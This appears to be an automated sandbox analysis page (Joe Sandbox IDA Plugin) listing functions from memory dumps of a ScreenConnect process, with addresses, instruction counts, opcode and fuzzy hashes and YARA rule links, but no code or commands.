API String ID:
Opcode ID: da8ae9c9356289f0ff3f73002d99e3a9ded1a9573329d7dac9a9cac29cae9fcb
Instruction ID: df164fc3d6932dfbcbf44a01544e3a2f98a6054caa199f51c70292f4ad3c7eb8
Opcode Fuzzy Hash: da8ae9c9356289f0ff3f73002d99e3a9ded1a9573329d7dac9a9cac29cae9fcb
Instruction Fuzzy Hash: 3B513A74E002099FDB01EFB8D844BDDBBB6FF99300F109659E104AB295DB79A985CF50

Function 019F7E50 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e175ab8bcb48ffc5486496a76f4e57c025713239278fb2499538a4c50c6ca6fb
Instruction ID: 7acc480cb5947847c9f571b75ae5859c5c70347a20ce82d6989cb835180838ff
Opcode Fuzzy Hash: e175ab8bcb48ffc5486496a76f4e57c025713239278fb2499538a4c50c6ca6fb
Instruction Fuzzy Hash: AC419031A00105CBDF19EFA9D59466EBBB6FFC4311B18C569DA09AB346DB34EC06CB90

Function 019FEF67 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c823a5293679bb87fde73e1d00d13e71cb9c76cb3698e7fafbb4f718854186
Instruction ID: e7b30315d6a69ae6d01a0f7ecd3609f0207c724dab722da2799af98b5ad2ae24
Opcode Fuzzy Hash: a7c823a5293679bb87fde73e1d00d13e71cb9c76cb3698e7fafbb4f718854186
Instruction Fuzzy Hash: 9C418371E0024A9BDB14DFA9C880ADEBBB5FF89710F148129E605B7280DB70A945CB91

Function 019FEAE9 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1ecf6b1738f9a0233bc1b1117f19bc32e3fd2c3309a1dfa9b643577ab69bfa
Instruction ID: 0ee373767b2d28b12b6adcff07050161398ff4a9fc320908142c9c845f99a77e
Opcode Fuzzy Hash: ec1ecf6b1738f9a0233bc1b1117f19bc32e3fd2c3309a1dfa9b643577ab69bfa
Instruction Fuzzy Hash: 023104B290E3C4AFC702CB28D860A91BF71EF53215F0B80DBD588CF1A3D624A816C761

Function 019FAAB0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9035cb66e45f54dd94bfe76773c83f7028af24aff01d4614da7be6f0a374380
Instruction ID: d006cbb3557e62e85405a28daceb156fc551a42d32997da92588923a84531bbf
Opcode Fuzzy Hash: d9035cb66e45f54dd94bfe76773c83f7028af24aff01d4614da7be6f0a374380
Instruction Fuzzy Hash: 26413530B012559FD7219B68D95472ABBEAAF80312F14CA6ED95E8B3D2DB30DC84C791

Function 064C2770 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 205e6fdee8b4fa74ba32a150e7f0ab4f08bfafe3e471860be7e5f99bf50c2234
Instruction ID: b657f91a315d16b05c1a8c9b50403fbc94e54160fbfaf5e231763d314033295f
Opcode Fuzzy Hash: 205e6fdee8b4fa74ba32a150e7f0ab4f08bfafe3e471860be7e5f99bf50c2234
Instruction Fuzzy Hash: 9B41DB31A046459FCB06CF54D88099AFBB2EF86310F15C6AAE904AF252D7B1E946CB90

Function 019F9968 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3d840777c946a5edc25d75f34d06e6706a6f0e2fedf4a6a12fb20cd4e1eb5a
Instruction ID: fddeb3975f7e45578de34a5eda612188dfe0459590ceff9186e364eb8c1d801c
Opcode Fuzzy Hash: 2e3d840777c946a5edc25d75f34d06e6706a6f0e2fedf4a6a12fb20cd4e1eb5a
Instruction Fuzzy Hash: 3E415B30B102019FDB18DB69D894AAEBBF6FF88615B15856CE50ADB3A1DF70DC05CB90

Function 019FDB98 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893ee76fadfac0c8e61be7194e6614b9cfb5881212d6f53d7804db6aa2fbcbeb
Instruction ID: 6c7a776bafbd115e2bf0fe1228406533d832befba0286017c72c43b93d1063a1
Opcode Fuzzy Hash: 893ee76fadfac0c8e61be7194e6614b9cfb5881212d6f53d7804db6aa2fbcbeb
Instruction Fuzzy Hash: 1D418C30600B059FD735CF69D844656BBF1EF85325B148B2DD2AA8B6E2D770E94ACF80

Function 019F7920 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d94e03b08377bd8daa7dad68e11f57869f47064c1239f51837115f760f097dd8
Instruction ID: e2017b3452447a6d327506577bf9fafd05369146d9ba27a126b5f83d1591c812
Opcode Fuzzy Hash: d94e03b08377bd8daa7dad68e11f57869f47064c1239f51837115f760f097dd8
Instruction Fuzzy Hash: F0318F30B001059BEB189FA9C494AAFBBF6EF89355F14846ED60AE7350DB70DD048BA0

Function 019F9978 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddda04db5c358a1296b507e300ee450405dfd43bf74e7e24e79e03d937de574c
Instruction ID: ca1d406efb305fbb4045d998f2e93139afaaa5875b51cb29ad2f8a2983cb8307
Opcode Fuzzy Hash: ddda04db5c358a1296b507e300ee450405dfd43bf74e7e24e79e03d937de574c
Instruction Fuzzy Hash: B9415B307102159FCB18DB79D894AAEBBF6BF88615B15856DE50AE73A0DF70EC04CB90

Function 019F4C6C Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63644baacaf66c65753eeafb9f8a89dac58db3f67f3b5cc66f570e1f4ad6817d
Instruction ID: 6800f36cb10ec14faad9431c458db840eece9aaeca2a412816942e6467852607
Opcode Fuzzy Hash: 63644baacaf66c65753eeafb9f8a89dac58db3f67f3b5cc66f570e1f4ad6817d
Instruction Fuzzy Hash: A1418071A003599FEB60DF68DC04B9EBBBAFB45310F0085A9D60CA7281DB755E94CF92

Function 019F7390 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e49e97ac4924432f7a4f562c43dc294b5908ceefacbdd78b9b957ffd9613208
Instruction ID: 6f9e6a127d47efe99c5e17bb2cc5349ef8849c03cbbdab14b5788a1491142681
Opcode Fuzzy Hash: 4e49e97ac4924432f7a4f562c43dc294b5908ceefacbdd78b9b957ffd9613208
Instruction Fuzzy Hash: E231E870B041059FC706DBA8D85456EFFB7EFC9610B14806EC609EB391DB319C05C7A5

Function 019F52F8 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd82861504357474474eb564993003de426ca1d6a4aca132bd79ab26520e94d5
Instruction ID: d4249bb7e639c4d45539bb5a2f9fb08368db8e209d0e0e571bdc0fe14bb0a5c2
Opcode Fuzzy Hash: cd82861504357474474eb564993003de426ca1d6a4aca132bd79ab26520e94d5
Instruction Fuzzy Hash: 19316D719003099FDB14DFA9C84469EFBF8EF88220F14846ED609A3241D7B8A945CBA5

Function 019FDC08 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fdd1975d5755e555a63514b5ebe82c2547788222a4fcad5bfce7ac2f21d01ae
Instruction ID: e159f9dc5edb9af1d22b99c9837007c7a3bc9464d08a52efa3b41f8be850630d
Opcode Fuzzy Hash: 5fdd1975d5755e555a63514b5ebe82c2547788222a4fcad5bfce7ac2f21d01ae
Instruction Fuzzy Hash: 67315970A00B059FD730DF69C84465ABBF5EF86321F144A1CD29A9B6E2D770E946CF80

Function 019F36B0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c1d7cb2b4e3a2cabca53406bc7ab8b666672f2597bd07652ca8900c2431f989
Instruction ID: 1acfbda8b348ae443f688100559eba21f96df7fe59c122581ec186443d3dde0c
Opcode Fuzzy Hash: 2c1d7cb2b4e3a2cabca53406bc7ab8b666672f2597bd07652ca8900c2431f989
Instruction Fuzzy Hash: CD313370A01205EFCB15DFB4DC4849EBBB9FF45212B1081AADA09D7241DB34AE00CF61

Function 019F6568 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce9d7e41786aa1b0ca37aeeaade7cb3ce9f3fcece85a52c2bd73636a82dd1ad
Instruction ID: d45ae1c5fcf85948af0c3f588690a5146118ceffc3d4fbb7cb072c5975fe8e1d
Opcode Fuzzy Hash: 1ce9d7e41786aa1b0ca37aeeaade7cb3ce9f3fcece85a52c2bd73636a82dd1ad
Instruction Fuzzy Hash: E1310A306007019FD730DF29C84496ABBF5EF89315B144A2CD55ADB7A5DB30E946CB80

Function 019F8C20 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27059c0ebe3b42bda7ffd87beb8929a442e3863ff35db7f758c7954fec18a874
Instruction ID: 0a0c4d6e266e614a58341a72d4637fc16e05e1f81edebeead1e66c8040c6d82b
Opcode Fuzzy Hash: 27059c0ebe3b42bda7ffd87beb8929a442e3863ff35db7f758c7954fec18a874
Instruction Fuzzy Hash: 3E216B71B00202ABEF05D7789C407ED7BA7EBC1211F04852DD6099B352EA70AD06C7E5

Function 019FDC18 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b5882555b94ac966d1503b31b46e31be2c341af0687411193ea3017622cbd1
Instruction ID: 17e85f13b1e54ae042153a705c2cf915f322e33526c47db2fc132ad028208d55
Opcode Fuzzy Hash: 54b5882555b94ac966d1503b31b46e31be2c341af0687411193ea3017622cbd1
Instruction Fuzzy Hash: 00312630600B069FD730DF69C84466ABBF5EF89325B144A1CD29A9B6A5D770E94ACF80

Function 019F90A8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 722487c33d060ce5fb567bfa4764a874ce7e774b2f727ada2132de561021b697
Instruction ID: f8ec1afd98ab962fd56a43cef268dd2cf8cfe089783edc63803c08c27cc942d0
Opcode Fuzzy Hash: 722487c33d060ce5fb567bfa4764a874ce7e774b2f727ada2132de561021b697
Instruction Fuzzy Hash: 75314A306007019FD730CF29D888A6ABBF5FF89325B144A2CE59ADB7A1D731E945CB91

Function 019FDDC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30dc494aff53db296331c4c1a7327a80c3db89ef996b31dd30b014fa8b1d0352
Instruction ID: bf3be7a90e91241c27792757f2a720dee52d2bdaf60f2ce091a90b66deb6732a
Opcode Fuzzy Hash: 30dc494aff53db296331c4c1a7327a80c3db89ef996b31dd30b014fa8b1d0352
Instruction Fuzzy Hash: 413108306006019FD734DF69C844A6ABBF5AF99311B148A2CD66ADB7A1D730F946CF90

Function 019FE4F9 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33695aaf92deb3ed51c601dfc93be5b4918034a0a3451ac8dec2193a52a1447d
Instruction ID: a4addd8ac6e453579e9a3b32b57ea2ab861ab873ff99fe10a70e9ae8421ea1ad
Opcode Fuzzy Hash: 33695aaf92deb3ed51c601dfc93be5b4918034a0a3451ac8dec2193a52a1447d
Instruction Fuzzy Hash: 7C21F931B04205ABDF289B65CC98BAF7F7BBBC8610F09452DE105A72D4EE719C00C755

Function 0169D59C Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3391496520.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_169d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769b4b44d9b959fed34c93cc349fda50283b6d3655f9cb6604d5e618d0834e67
Instruction ID: f8f746b9bf746ff68a7e44cf55e8ac35932a0847232eb562712cb5f35e87c05f
Opcode Fuzzy Hash: 769b4b44d9b959fed34c93cc349fda50283b6d3655f9cb6604d5e618d0834e67
Instruction Fuzzy Hash: 872100B6504244EFDF05DF54DDC0B2ABF6AFB88324F208179E9094B256C336D456CBA1

Function 019F36A0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e149b67a41db8a66189acfdd4d8077736d460607ca54bc27ba90c185cb26be
Instruction ID: 00cd6d630f4d6332603c00c1eb78a8adaf38119a3a9a16f176b95e1cc660cd82
Opcode Fuzzy Hash: f4e149b67a41db8a66189acfdd4d8077736d460607ca54bc27ba90c185cb26be
Instruction Fuzzy Hash: 702104B5A00211DFCB209F78DD484AEBBB5FF49326B048169DA1AD7241EB35ED12CF50

Function 019FE198 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9383dbd660d66b4ee9766bcccc630d05b4569aeda67b6527e4c3af5d51a5a01b
Instruction ID: 48d0c69bdd4e0345a89feac9be19ce398e088bf340e6a3ab03b4fe535a5e29e1
Opcode Fuzzy Hash: 9383dbd660d66b4ee9766bcccc630d05b4569aeda67b6527e4c3af5d51a5a01b
Instruction Fuzzy Hash: 3A216F71A002059FDB05DB68DC41AAEBFF5FF85310F00856DE609AB351DB70AD05CBA1

Function 019F0ECF Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ce793e6d7e2745ac60b0b1cc7e310837e83f510f5d9634c7b9b37862b42f79b
Instruction ID: 4f88f84588b02a8d924142a56f0716afcdd89aa5d8f8237ba0b52d51d8cf96f0
Opcode Fuzzy Hash: 1ce793e6d7e2745ac60b0b1cc7e310837e83f510f5d9634c7b9b37862b42f79b
Instruction Fuzzy Hash: 651138A260E380AFC3068B688C645A57F6ADB53645B4C40DFE289CF253E5D6AC03C751

Function 019FED68 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df93000dcc495cb9f5ded848b15e2c4c8b0ed47158671ffcac85b0a467b7bf2e
Instruction ID: 71aa1c20aaecb34e0704851f3f20973f4741f586eafcc02452ace5ce7ede5c5d
Opcode Fuzzy Hash: df93000dcc495cb9f5ded848b15e2c4c8b0ed47158671ffcac85b0a467b7bf2e
Instruction Fuzzy Hash: 96217C32D1470A9DCB01EFB8D8506EAFBB4EF99310F11C62AD558A7051FB70A295C781

Function 019F86D0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b107be634024c86148ec5eaf823519058a4f152b48328e625289decd76f33ecc
Instruction ID: f9ceba9446ce8e4d72244926b7c8e662c2b8d631c2e4d78947b1633199105257
Opcode Fuzzy Hash: b107be634024c86148ec5eaf823519058a4f152b48328e625289decd76f33ecc
Instruction Fuzzy Hash: 64215E302006059FD734CF29C844A9ABBF5EF84321B148A2CD597976A1DB31E95ACF90

Function 019FF2CC Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba506e945831034c7d7dc81e647564e9091e93d685768e3aa11db8d66883e6e4
Instruction ID: c884a852ef0f8451e12b3a4eed759edfb1172a4d0960371ee15319b3d91fe003
Opcode Fuzzy Hash: ba506e945831034c7d7dc81e647564e9091e93d685768e3aa11db8d66883e6e4
Instruction Fuzzy Hash: F1214876800249DFDF10CF9AC844ADEBBF5FB48310F148429EA19A7210D375A555CFA5

Function 019FF878 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5163053930645e2c80ff0a69c2c2d105024ce75387dfd61c7780bcc66596cbda
Instruction ID: 63ae49400d1a66d065a7d83845e4dc90f9caf7c6a15d76bba62334a0140d9779
Opcode Fuzzy Hash: 5163053930645e2c80ff0a69c2c2d105024ce75387dfd61c7780bcc66596cbda
Instruction Fuzzy Hash: AE21487680024ADFDF10CF9AC844ADEBBF5FF48320F14852AEA18A7251D379A555CFA1

Function 064C02C5 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b78512037d5d3ad65a10aecea7b0c262c10953ee4852d7a7f6260e8317aa3cd
Instruction ID: 245e3748470c054affa7b30e857c6b5880f9c8150d5b6f70627fac3a654137d1
Opcode Fuzzy Hash: 7b78512037d5d3ad65a10aecea7b0c262c10953ee4852d7a7f6260e8317aa3cd
Instruction Fuzzy Hash: 14112732B057909FCB974B39985495E7FF5AF9766070980BFE449CB362C6218C01C7A2

Function 019FA7B0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb93ef0a0713ee3fcec0ecbc3842d00361cadc15ad89f5880a13acf45c103dd
Instruction ID: ce124141ecffa2606875f9b5b80cf408b6bbe61db6a781f6aeb1187f705e72a2
Opcode Fuzzy Hash: 2eb93ef0a0713ee3fcec0ecbc3842d00361cadc15ad89f5880a13acf45c103dd
Instruction Fuzzy Hash: 64212C30A00701DFD728DF69D944A6ABBF5FF48311B148A2CD6AE97694DB74E901CF81

Function 019F8C30 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec3a8e36c6a91853fd0b8b1f568aa489e53930e9204567579c0e0bdcfbb6880
Instruction ID: 914287d7c5471b7568ed0a333aadad50b388184056d7efb6d246b88098409bf1
Opcode Fuzzy Hash: fec3a8e36c6a91853fd0b8b1f568aa489e53930e9204567579c0e0bdcfbb6880
Instruction Fuzzy Hash: 71119031B002059BEB04EB78DD41BAEBBA7EBC5211F40852DD605AB395DF70AD058BE5

Function 019F8B30 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 841caa5b65cf1a89004d1aab44bdbbef80394b55fff8844543f8bdad3e3d5f5c
Instruction ID: 2eb48509d3d8a11a2e47c887122394372cd743154aef3ffa3eed284b5df03afa
Opcode Fuzzy Hash: 841caa5b65cf1a89004d1aab44bdbbef80394b55fff8844543f8bdad3e3d5f5c
Instruction Fuzzy Hash: E5118171A0011DEBCF49DFA9D8049DDBFB6EF85311B44852DE209BB251DA31A8068B94

Function 019FE1A8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c952ed40df37fe8e15a07b3cde3457b4e16629e2fd4807107e5864c2991c115
Instruction ID: a2855db84ccacde2aaf0639191fffb23cbe32a10359ea8f247ba458fefd9a283
Opcode Fuzzy Hash: 7c952ed40df37fe8e15a07b3cde3457b4e16629e2fd4807107e5864c2991c115
Instruction Fuzzy Hash: F5114F70B0020A9FDB04DB68DC819AEBBF6FF88310B108529E619AB310DB70ED05CB95

Function 019F8AA0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ab1f38c96a3bfb24e6dbe16e825fe62b6f275896c295e1137488c58dbfb3a1
Instruction ID: b7f9e3a71b13550404932e09a0d470130be7bf353db21c5479217d6ff3b8ba69
Opcode Fuzzy Hash: b6ab1f38c96a3bfb24e6dbe16e825fe62b6f275896c295e1137488c58dbfb3a1
Instruction Fuzzy Hash: F411987590021ADFCF42DF64C9408DEBBF5FF49314B148159E609BB251D731AE09CB91

Function 019FE618 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c5ccc813a9063b4fd33c7ef243d981403f83095e5abc72c62723ee0f4ba483
Instruction ID: 22a05caa3421acbfec73d166384045356e1f405ad6a3205e0ea2888b23d82c4a
Opcode Fuzzy Hash: 46c5ccc813a9063b4fd33c7ef243d981403f83095e5abc72c62723ee0f4ba483
Instruction Fuzzy Hash: 380149B1B056486FD704DB6CAC8159D7BB9FFD2314B06C0AED908CB252DA319D03C390

Function 019F91A8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779a94aacf92d189c3ec835c9cc7113ad6bb33488fcc0c3ede159fb1907c302a
Instruction ID: 1fb5b06ed7e4bcbc4de76a9440c800251a20e3c1162d503590fdd03735c39976
Opcode Fuzzy Hash: 779a94aacf92d189c3ec835c9cc7113ad6bb33488fcc0c3ede159fb1907c302a
Instruction Fuzzy Hash: 04110675E00204BFDB16CF58C800AEA7BB6BFC1304F0884AEE608D7152E3719901CB91

Function 019F73F8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
